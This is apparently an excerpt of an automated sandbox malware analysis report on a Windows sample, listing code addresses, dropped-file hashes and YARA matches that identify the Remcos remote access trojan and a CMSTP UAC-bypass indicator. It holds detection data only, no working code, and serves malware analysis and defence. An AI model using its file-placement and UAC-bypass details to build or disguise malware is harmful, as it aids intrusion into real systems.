              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60425 0_3_02B60425
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6102E 0_3_02B6102E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B62018 0_3_02B62018
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60419 0_3_02B60419
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60000 0_3_02B60000
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6040D 0_3_02B6040D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B61045 0_3_02B61045
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B609B0 0_3_02B609B0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B609BC 0_3_02B609BC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B609A4 0_3_02B609A4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B611EA 0_3_02B611EA
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B601DE 0_3_02B601DE
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B61531 0_3_02B61531
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6153D 0_3_02B6153D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60D38 0_3_02B60D38
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B62953 0_3_02B62953
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B61549 0_3_02B61549
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D620C4 0_2_02D620C4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0043E0CC 6_1_0043E0CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041F0FA 6_1_0041F0FA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00454159 6_1_00454159
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00438168 6_1_00438168
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004461F0 6_1_004461F0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0043E2FB 6_1_0043E2FB
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0045332B 6_1_0045332B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0042739D 6_1_0042739D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004374E6 6_1_004374E6
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0043E558 6_1_0043E558
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00438770 6_1_00438770
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004378FE 6_1_004378FE
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00433946 6_1_00433946
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0044D9C9 6_1_0044D9C9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00427A46 6_1_00427A46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041DB62 6_1_0041DB62
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00427BAF 6_1_00427BAF
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00437D33 6_1_00437D33
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00435E5E 6_1_00435E5E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00426E0E 6_1_00426E0E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0043DE9D 6_1_0043DE9D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00413FCA 6_1_00413FCA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00436FEA 6_1_00436FEA
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 7_2_004057B8 7_2_004057B8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02D920C4 8_2_02D920C4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0043E0CC 10_1_0043E0CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041F0FA 10_1_0041F0FA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00454159 10_1_00454159
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00438168 10_1_00438168
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004461F0 10_1_004461F0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0043E2FB 10_1_0043E2FB
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0045332B 10_1_0045332B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0042739D 10_1_0042739D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004374E6 10_1_004374E6
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0043E558 10_1_0043E558
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00438770 10_1_00438770
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004378FE 10_1_004378FE
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00433946 10_1_00433946
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0044D9C9 10_1_0044D9C9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00427A46 10_1_00427A46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041DB62 10_1_0041DB62
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00427BAF 10_1_00427BAF
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00437D33 10_1_00437D33
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00435E5E 10_1_00435E5E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00426E0E 10_1_00426E0E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0043DE9D 10_1_0043DE9D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00413FCA 10_1_00413FCA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00436FEA 10_1_00436FEA
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 12_2_004057B8 12_2_004057B8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E220C4 15_2_02E220C4
              Source: Joe Sandbox View Dropped File: C:\ProgramData\Remcos\remcos.exe 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
              Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02E26658 appears 32 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02D94824 appears 628 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02E24698 appears 156 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02E24824 appears 628 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02D96658 appears 32 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: String function: 02D94698 appears 156 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00402213 appears 38 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 004052FD appears 32 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00434E10 appears 108 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 0040417E appears 46 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00402093 appears 100 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00434770 appears 82 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00401E65 appears 70 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00401FAB appears 40 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00411F67 appears 32 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 004020DF appears 40 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 00457A28 appears 34 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 004484CA appears 36 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 004458D0 appears 56 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: String function: 004046F7 appears 34 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: String function: 02D66658 appears 32 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: String function: 02D64698 appears 247 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: String function: 02D77BE8 appears 45 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: String function: 02D644A0 appears 67 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: String function: 02D64824 appears 882 times
              Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 0040A6C4 appears 136 times
              Source: netutils.dll.0.dr Static PE information: Number of sections : 19 > 10
              Source: udVh4Ist4Z.exe Binary or memory string: OriginalFilename vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014010000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2138564063.0000000014E9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2138564063.0000000014F00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
